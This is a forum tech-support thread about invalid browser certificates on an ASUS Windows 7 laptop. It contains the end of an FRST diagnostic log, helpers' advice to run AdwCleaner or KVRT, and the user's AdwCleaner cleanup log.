Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Nástroj pro odesílání služby Windows Live (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Trend Micro Internet Security (HKLM\...\{718D791F-F4E8-4aa7-98A6-15FDED17BDD0}) (Version: 17.50 - Trend Micro Inc.)
Trend Micro Internet Security (HKLM\...\{9D2B0322-44AE-460E-9283-4D2D7A9205AE}) (Version: 17.50 - Trend Micro Inc.) Hidden
USB 2.0 1.3M UVC WebCam (HKLM\...\USB 2.0 1.3M UVC WebCam) (Version: - )
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{4B4451CE-D1E6-4BDE-B4B2-59F03BB83B7C}) (Version: 14.0.8050.1202 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.26.0 - ASUS)
WinRAR 6.02 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.02.0 - win.rar GmbH)
Wireless Console 3 (HKLM-x32\...\{20FDF948-C8ED-4543-A539-F7F4AEF5AFA2}) (Version: 3.0.10 - ASUS)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{041F9391-C79D-44EE-AA4E-AF4E029C4B47}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{85D8EE2F-794F-41F0-BB03-49D56A23BEF4}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\PC\AppData\Local\Google\Chrome\Application\94.0.4606.81\notification_helper.exe (Google LLC -> Google LLC) [File not signed]
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-07-03] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2008-10-01 08:02 - 2008-10-01 08:08 - 000011264 _____ () [File not signed] C:\Program Files (x86)\ASUS\Splendid\GLCDdll.dll
2009-10-06 11:31 - 2009-05-07 10:53 - 000379392 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Dts2ApoApi64.dll
2009-10-06 11:31 - 2009-05-07 10:51 - 000071680 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\QsApoApi64.dll
2009-10-06 11:31 - 2009-07-06 08:37 - 047601664 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Skin.dll
2009-10-06 11:31 - 2008-01-18 08:49 - 000098816 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VMicApi.dll
2009-10-06 11:31 - 2007-03-10 03:58 - 000124416 _____ () [File not signed] C:\Program Files\ATKGFNEX\AGFNEX64.dll
2009-05-05 19:00 - 2009-05-05 19:00 - 000041472 _____ () [File not signed] C:\Program Files\P4G\DevMng.dll
2009-07-27 19:12 - 2009-07-27 19:12 - 000026624 _____ () [File not signed] C:\Program Files\P4G\OvrClk.dll
2009-10-06 11:33 - 2009-06-22 22:37 - 000212992 _____ () [File not signed] C:\Windows\SysWOW64\Fast Boot\GetBootTime.dll
2004-05-28 03:13 - 2004-05-28 03:13 - 000080384 _____ (ACTIONTEC Electronics,Inc) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\ATKWLIOC.DLL
2008-06-10 19:35 - 2008-06-10 19:35 - 000049152 _____ (ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\ATKMETHOD.dll
2005-04-08 06:38 - 2009-07-10 00:43 - 000052736 _____ (ASUSTeK) [File not signed] C:\Program Files (x86)\ASUS\Splendid\Chameleon.dll
2005-06-03 10:39 - 2006-09-12 01:46 - 000035840 _____ (ASUSTek) [File not signed] C:\Program Files (x86)\ASUS\Splendid\OVS.dll
2005-09-22 02:30 - 2005-09-22 02:30 - 000036864 _____ (ATK) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\inter_f2.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 000442712 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\libegl.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 007866200 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\libglesv2.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 004401496 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\vk_swiftshader.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 000733016 _____ (Google LLC -> ) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\vulkan-1.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 176138584 _____ (Google LLC -> Google LLC) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\chrome.dll
2021-10-25 16:56 - 2021-10-16 03:44 - 001187672 _____ (Google LLC -> Google LLC) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\chrome_elf.dll
2021-10-25 16:56 - 2021-10-16 03:20 - 004891080 _____ (Microsoft Corporation -> Microsoft Corporation) [File not signed] C:\Program Files\Google\Chrome\Application\95.0.4638.54\D3DCompiler_47.dll
2009-08-22 11:02 - 2009-08-22 11:02 - 001652736 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Trend Micro\Internet Security\MFC80U.DLL
2005-01-13 09:36 - 2005-01-13 09:36 - 000303104 _____ (Silicon Integrated Systems Corp.) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\SiSPkt.dll
2021-07-05 14:22 - 2021-06-11 11:17 - 000571544 _____ (win.rar GmbH -> Alexander Roshal) [File not signed] C:\Program Files\WinRAR\rarext.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Version 8) (Whitelisted) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//asus.msn.com
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//asus.msn.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
BHO: Windows Live Family Safety Browser Helper Class -> {4f3ed5cd-0726-42a9-87f5-d13f3d2976ac} -> C:\Program Files\Windows Live\Family Safety\fssbho.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Pomocník pro přihlášení ke službě Windows Live -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2008-11-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM-x32 - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\PC\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 78.157.167.7 - 78.157.167.57
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{AD1925B9-10F2-4E15-B702-45B687BF9C5D}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DDC37A15-CF76-4EE2-AC69-8F450DF3E551}] => (Allow) C:\Windows\system32\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6AE3529A-4DCD-488F-9D52-F549C33A7685}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{A5FEFD13-E490-4420-B2FF-C2591F4D06D4}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{6FAEB1BD-6225-4CA1-88A1-35422AEFDB14}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [TCP Query User{EA50643B-3BA1-42C9-8A94-29A298B813B1}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{4DD63112-DB4B-45D6-B2A8-E15EB604C55D}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [{1E472D29-7705-4C3D-846D-190DB4FA8F87}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) [File not signed]

==================== Restore Points =========================

03-01-2021 19:32:13 Nainstalováno rozhraní DirectX
03-01-2021 19:42:38 Windows Update
05-07-2021 13:55:40 Removed 2007 Microsoft Office system
05-07-2021 14:30:59 Installed Microsoft Office Enterprise 2007

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (10/26/2021 04:52:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: FRST64.exe, verze: 20.10.2021.0, časové razítko: 0x61703b27
Název chybujícího modulu: FRST64.exe, verze: 20.10.2021.0, časové razítko: 0x61703b27
Kód výjimky: 0xc0000005
Posun chyby: 0x000000000002687a
ID chybujícího procesu: 0x175c
Čas spuštění chybující aplikace: 0x01d7ca7863a1dab1
Cesta k chybující aplikaci: C:\Users\PC\Desktop\FRST64.exe
Cesta k chybujícímu modulu: C:\Users\PC\Desktop\FRST64.exe
ID zprávy: 50bf50ce-366c-11ec-91ac-90e6ba63844b

Error: (10/26/2021 04:42:35 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:34 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:33 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 04:42:31 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.


System errors:
=============
Error: (10/26/2021 05:02:07 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Server {BB6DF56B-CACE-11DC-9992-0019B93A3A84} se v daném časovém limitu neregistroval u služby DCOM.

Error: (10/26/2021 04:54:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:54:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:54:37 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:47:49 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:47:49 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:47:48 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 04:38:42 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 40.


==================== Memory info ===========================

BIOS: American Megatrends Inc. 212 08/26/2009
Motherboard: ASUSTeK Computer Inc. K50IJ
Processor: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz
Percentage of memory in use: 85%
Total physical RAM: 4061.09 MB
Available physical RAM: 587.36 MB
Total Virtual: 8120.32 MB
Available Virtual: 788.01 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:149.05 GB) (Free:110.63 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (DATA) (Fixed) (Total:134.39 GB) (Free:65.13 GB) NTFS


==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: D9B3496E)
Partition 1: (Not Active) - (Size=14.6 GB) - (Type=1C)
Partition 2: (Active) - (Size=149 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=134.4 GB) - (Type=0F Extended)

==================== End of Addition.txt =======================

Re: invalid certificates in browsers

Posted: 26 Oct 2021 16:51
by Rudy
Hello!
Run this utility:
Save AdwCleaner to your desktop: https://malwarebytes.com/adwcleaner/ or http://www.bleepingcomputer.com/download/adwcleaner/

close all programs
accept the license terms (EULA) by clicking I agree
right-click the AdwCleaner icon and choose Run as administrator (on Win XP just run it with a normal double-click)
click Scan now, then Clean and Repair
after the restart a log will pop up (or you can find it in C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt); copy its contents into your next reply

Re: invalid certificates in browsers

Posted: 26 Oct 2021 16:53
by JaRon
Hi
download Avptool Kvrt, restart the PC into safe mode and clean the computer with Kvrt

Re: invalid certificates in browsers

Posted: 26 Oct 2021 17:01
by Eddydye
# -------------------------------
# Malwarebytes AdwCleaner 8.3.0.0
# -------------------------------
# Build: 06-29-2021
# Database: 2021-10-26.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 10-26-2021
# Duration: 00:00:15
# OS: Windows 7 Home Premium
# Cleaned: 33
# Failed: 0


***** [ Services ] *****

Deleted Main Service

***** [ Folders ] *****

Deleted C:\Program Files (x86)\MachinerData

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser|{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKLM\Software\Wow6432Node\\Classes\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068}
Deleted HKLM\Software\Wow6432Node\\Microsoft\Internet Explorer\Toolbar|{21FA44EF-376D-4D53-9B0F-8A89D3229068}

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

Deleted Preinstalled.ASUSControlDeck Folder C:\Program Files (x86)\ASUS\CONTROLDECK
Deleted Preinstalled.ASUSControlDeck Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{169201BA-EF95-4DBA-A040-93D29590C6AF}
Deleted Preinstalled.ASUSControlDeck Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASUSControlDeck
Deleted Preinstalled.ASUSControlDeck Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{5B65EF64-1DFA-414A-8C94-7BB726158E21}
Deleted Preinstalled.ASUSControlDeck Task C:\Windows\System32\Tasks\ASUSCONTROLDECK
Deleted Preinstalled.ASUSFancyStart Folder C:\ASUS.DAT
Deleted Preinstalled.ASUSFancyStart Folder C:\Program Files (x86)\ASUS\FANCYSTART
Deleted Preinstalled.ASUSLiveUpdate Folder C:\Program Files (x86)\ASUS\ASUS LIVE UPDATE
Deleted Preinstalled.ASUSLiveUpdate Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C02341A7-0F42-4050-B91B-7BBE20935F36}
Deleted Preinstalled.ASUSLiveUpdate Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ASUS Live Update
Deleted Preinstalled.ASUSLiveUpdate Task C:\Windows\System32\Tasks\ASUS LIVE UPDATE
Deleted Preinstalled.ASUSSplendid Folder C:\Program Files (x86)\ASUS\SPLENDID
Deleted Preinstalled.ASUSSplendid Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9EA161CC-94DA-40D4-AD7B-00389FB1DC3C}
Deleted Preinstalled.ASUSSplendid Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ACMON
Deleted Preinstalled.ASUSSplendid Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{0969AF05-4FF6-4C00-9406-43599238DE0D}
Deleted Preinstalled.ASUSSplendid Task C:\Windows\System32\Tasks\ACMON
Deleted Preinstalled.ASUSVirtualCamera Folder C:\Program Files (x86)\ASUS\VIRTUALCAMERA
Deleted Preinstalled.ASUSVirtualCamera Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{EC8BD21F-0CA0-4BBF-97D9-4A52B30041A1}
Deleted Preinstalled.CyberLinkLabelPrint Folder C:\Program Files (x86)\CYBERLINK\LABELPRINT
Deleted Preinstalled.CyberLinkLabelPrint Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|UpdateLBPShortCut
Deleted Preinstalled.CyberLinkLabelPrint Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}
Deleted Preinstalled.CyberLinkLabelPrint Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{C59C179C-668D-49A9-B6EA-0121CCFC1243}
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Shared Tools\MSConfig\startupreg\CLMLServer
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|UpdateP2GoShortCut
